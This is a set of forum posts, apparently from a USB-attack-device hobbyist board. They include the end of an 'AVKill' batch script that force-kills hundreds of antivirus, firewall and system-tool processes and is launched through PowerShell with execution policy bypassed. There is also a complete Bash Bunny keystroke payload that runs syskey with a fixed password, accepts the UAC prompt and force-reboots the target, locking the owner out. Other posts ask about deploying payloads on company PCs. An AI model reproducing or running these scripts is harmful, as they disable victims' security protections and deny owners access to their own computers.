/IM mfweng3.02d30.exe /IM mgavrtcl.exe /IM mgavrte.exe /IM mghtml.exe /IM mgui.exe /IM minilog.exe /IM mmod.exe /IM monitor.exe Taskkill /T /F /IM moolive.exe /IM mostat.exe /IM mpfagent.exe /IM mpfservice.exe /IM mpftray.exe /IM mrflux.exe /IM msapp.exe /IM msbb.exe /IM msblast.exe /IM mscache.exe Taskkill /T /F /IM msccn32.exe /IM mscman.exe /IM msconfig.exe /IM msdm.exe /IM msdos.exe /IM msiexec16.exe /IM msinfo32.exe /IM mslaugh.exe /IM msmgt.exe /IM msmsgri32.exe Taskkill /T /F /IM mssmmc32.exe /IM mssys.exe /IM msvxd.exe /IM mu0311ad.exe /IM mwatch.exe /IM n32scanw.exe /IM nav.exe /IM navap.navapsvc.exe /IM navapsvc.exe /IM navapw32.exe Taskkill /T /F /IM navdx.exe /IM navlu32.exe /IM navnt.exe /IM navstub.exe /IM navw32.exe /IM navwnt.exe /IM nc2000.exe /IM ncinst4.exe /IM ndd32.exe /IM neomonitor.exe Taskkill /T /F /IM neowatchlog.exe /IM netarmor.exe /IM netd32.exe /IM netinfo.exe /IM netmon.exe /IM netscanpro.exe /IM netspyhunter-1.2.exe /IM netstat.exe /IM netutils.exe Taskkill /T /F /IM nisserv.exe /IM nisum.exe /IM nmain.exe /IM nod32.exe /IM normist.exe /IM norton_internet_secu_3.0_407.exe /IM notstart.exe /IM npf40_tw_98_nt_me_2k.exe Taskkill /T /F /IM npfmessenger.exe /IM nprotect.exe /IM npscheck.exe /IM npssvc.exe /IM nsched32.exe /IM nssys32.exe /IM nstask32.exe /IM nsupdate.exe /IM nt.exe /IM ntrtscan.exe Taskkill /T /F /IM ntvdm.exe /IM ntxconfig.exe /IM nui.exe /IM nupgrade.exe /IM nvarch16.exe /IM nvc95.exe /IM nvsvc32.exe /IM nwinst4.exe /IM nwservice.exe /IM nwtool16.exe Taskkill /T /F /IM ollydbg.exe /IM onsrvr.exe /IM optimize.exe /IM ostronet.exe /IM otfix.exe /IM outpost.exe /IM outpostinstall.exe /IM outpostproinstall.exe /IM padmin.exe Taskkill /T /F /IM panixk.exe /IM patch.exe /IM pavcl.exe /IM pavproxy.exe /IM pavsched.exe /IM pavw.exe /IM pccwin98.exe /IM pcfwallicon.exe /IM pcip10117_0.exe /IM pcscan.exe Taskkill /T /F /IM pdsetup.exe /IM periscope.exe /IM persfw.exe /IM perswf.exe /IM pf2.exe /IM pfwadmin.exe /IM pgmonitr.exe /IM pingscan.exe /IM platin.exe /IM pop3trap.exe Taskkill /T /F /IM poproxy.exe /IM popscan.exe /IM portdetective.exe /IM portmonitor.exe /IM powerscan.exe /IM ppinupdt.exe /IM pptbc.exe /IM ppvstop.exe /IM prizesurfer.exe Taskkill /T /F /IM prmt.exe /IM prmvr.exe /IM procdump.exe /IM processmonitor.exe /IM procexplorerv1.0.exe /IM programauditor.exe /IM proport.exe /IM protectx.exe /IM pspf.exe Taskkill /T /F /IM purge.exe /IM qconsole.exe /IM qserver.exe /IM rapapp.exe /IM rav7.exe /IM rav7win.exe /IM rav8win32eng.exe /IM ray.exe /IM rb32.exe /IM rcsync.exe /IM realmon.exe Taskkill /T /F /IM reged.exe /IM regedit.exe /IM regedt32.exe /IM rescue.exe /IM rescue32.exe /IM rrguard.exe /IM rshell.exe /IM rtvscan.exe /IM rtvscn95.exe /IM rulaunch.exe Taskkill /T /F /IM run32dll.exe /IM rundll.exe /IM rundll16.exe /IM ruxdll32.exe /IM safeweb.exe /IM sahagent.exe /IM save.exe /IM savenow.exe /IM sbserv.exe /IM sc.exe /IM scam32.exe Taskkill /T /F /IM scan32.exe /IM scan95.exe /IM scanpm.exe /IM scrscan.exe /IM serv95.exe /IM setup_flowprotector_us.exe /IM setupvameeval.exe /IM sfc.exe /IM sgssfw32.exe Taskkill /T /F /IM sh.exe /IM shellspyinstall.exe /IM shn.exe /IM showbehind.exe /IM smc.exe /IM sms.exe /IM smss32.exe /IM soap.exe /IM sofi.exe /IM sperm.exe /IM spf.exe Taskkill /T /F /IM sphinx.exe /IM spoler.exe /IM spoolcv.exe /IM spoolsv32.exe /IM spyxx.exe /IM srexe.exe /IM srng.exe /IM ss3edit.exe /IM ssg_4104.exe /IM ssgrate.exe /IM st2.exe Taskkill /T /F /IM start.exe /IM stcloader.exe /IM supftrl.exe /IM support.exe /IM supporter5.exe /IM svc.exe /IM svchostc.exe /IM svchosts.exe /IM svshost.exe /IM sweep95.exe Taskkill /T /F /IM sweepnet.sweepsrv.sys.swnetsup.exe /IM symproxysvc.exe /IM symtray.exe /IM sysedit.exe /IM system.exe /IM system32.exe /IM sysupd.exe /IM taskmg.exe /IM taskmgr.exe Taskkill /T /F /IM taskmo.exe /IM taskmon.exe /IM taumon.exe /IM tbscan.exe /IM tc.exe /IM tca.exe /IM tcm.exe /IM tds-3.exe /IM tds2-98.exe /IM tds2-nt.exe /IM teekids.exe Taskkill /T /F /IM tfak.exe /IM tfak5.exe /IM tgbob.exe /IM titanin.exe /IM titaninxp.exe /IM tracert.exe /IM trickler.exe /IM trjscan.exe /IM trjsetup.exe /IM trojantrap3.exe Taskkill /T /F /IM tsadbot.exe /IM tvmd.exe /IM tvtmd.exe /IM undoboot.exe /IM updat.exe /IM update.exe /IM upgrad.exe /IM utpost.exe /IM vbcmserv.exe /IM vbcons.exe Taskkill /T /F /IM vbust.exe /IM vbwin9x.exe /IM vbwinntw.exe /IM vcsetup.exe /IM vet32.exe /IM vet95.exe /IM vettray.exe /IM vfsetup.exe /IM vir-help.exe /IM virusmdpersonalfirewall.exe Taskkill /T /F /IM vnlan300.exe /IM vnpc3000.exe /IM vpc32.exe /IM vpc42.exe /IM vpfw30s.exe /IM vptray.exe /IM vscan40.exe /IM vscenu6.02d30.exe /IM vsched.exe /IM vsecomr.exe Taskkill /T /F /IM vshwin32.exe /IM vsisetup.exe /IM vsmain.exe /IM vsmon.exe /IM vsstat.exe /IM vswin9xe.exe /IM vswinntse.exe /IM vswinperse.exe /IM w32dsm89.exe /IM w9x.exe Taskkill /T /F /IM watchdog.exe /IM webdav.exe /IM webscanx.exe /IM webtrap.exe /IM wfindv32.exe /IM whoswatchingme.exe /IM wimmun32.exe /IM win-bugsfix.exe /IM win32.exe Taskkill /T /F /IM win32us.exe /IM winactive.exe /IM window.exe /IM windows.exe /IM wininetd.exe /IM wininitx.exe /IM winlogin.exe /IM winmain.exe /IM winnet.exe /IM winppr32.exe Taskkill /T /F /IM winrecon.exe /IM winservn.exe /IM winssk32.exe /IM winstart.exe /IM winstart001.exe /IM wintsk32.exe /IM winupdate.exe /IM wkufind.exe /IM wnad.exe /IM wnt.exe Taskkill /T /F /IM wradmin.exe /IM wrctrl.exe /IM wsbgate.exe /IM wupdater.exe /IM wupdt.exe /IM wyvernworksfirewall.exe /IM xpf202en.exe /IM zapro.exe /IM zapsetup3001.exe Taskkill /T /F /IM zatutor.exe /IM zonalm2601.exe /IM zonealarm.exe And to make it all come together. start.cmd @echo off cls REM Change AVKill.ps1 to AVKill.cmd if you prefer batch based files. powershell.exe -executionpolicy bypass "%~dp0\AVKill.ps1" >NUL @exit Until next time, when I get some more free time.. -Ar1k88
  23. I have a rubber ducky with the latest firmware and when trying to deploy a payload on my MS Windows 7 company Pcs and laptops nothing happens. But if I press the deploy button it works. The ducky is working correctly because I am able to deploy payloads on Linux machines using the same hardware as the Windows PC's, and external PC's running Windows 7. All out computers are from Dell and we have a myriad of models (Optiplex, Latitude, etc) running Windows 7 and 10, we are using ESET Endpoint Antivirus with real time file system protection activated. I am inclined that the ducky is not working because some software is blocking it. Perhaps ESET.??? I will appreciate if anyone can comment on this issue. Thanks. met.
  24. [PAYLOAD] SysKey - Bashbunny

    I saw a Syskey Prank done on a USB via RubberDucky. So I decided to rewrite one for the Bashbunny even tho it really serves no great purpose. So furthermore, after Syskey'ing myself. I dont want the dang thing anymore, so I'm releasing it. #!/bin/bash # # Title: SysKey and Reboot # Author: Ar1k88 # Version: 1.1b # Target: Windows 7-10 # # LED | Function # --------------------------------------------------------- # MAGENTA SLOW - USB Detection/Setup # YELLOW FAST/VERYFAST - Script Startup/Execute # CYAN VERYFAST - Shutting down Target Machine # GREEN BLINK/SOLID - Shutting down Bashbunny for safe removal # LED OFF - Bashbunny is Off, Safe to remove. # # Startup Delay 3 seconds. LED M SLOW ATTACKMODE HID Q DELAY 3000 # Force to Desktop LED Y FAST Q GUI d Q DELAY 250 # Open Run and Syskey Q GUI r Q DELAY 500 Q STRING syskey Q ENTER Q DELAY 500 # UAC Bypass Q ALT y # Setup Syskey - Setting Password as bashbunny LED Y VERYFAST Q DELAY 500 Q STRING u Q DELAY 250 Q STRING p Q DELAY 250 Q STRING w Q DELAY 250 Q STRING bashbunny Q TAB Q DELAY 250 Q STRING bashbunny Q DELAY 250 Q ENTER Q DELAY 500 Q ENTER # Rebooting Target Machine LED C VERYFAST Q GUI r Q DELAY 500 Q STRING CMD Q ENTER Q DELAY 500 Q STRING shutdown /r /f /t 0 Q ENTER Q DELAY 250 # Success - Starting Bashbunny Safe Shutdown LED SUCCESS sync -o Q DELAY 3000 shutdown 0 SysKey Password: bashbunny Please be responsible. ;) -Ar1k88
  25. Payload and unix command

    Hi there, I have a little question, i love my bash bunny, create a lot of payloads (i will post them when really finished), but still have some question. Actually for all my payload i open a terminal, minimize it and do my stuff. When i look at this kind of payload , on line 24 there is a unix command "mkdir". So, it's possible to use unix command without a terminal ? Reminder for people who read this topic, working unix command in payload : mkdir source export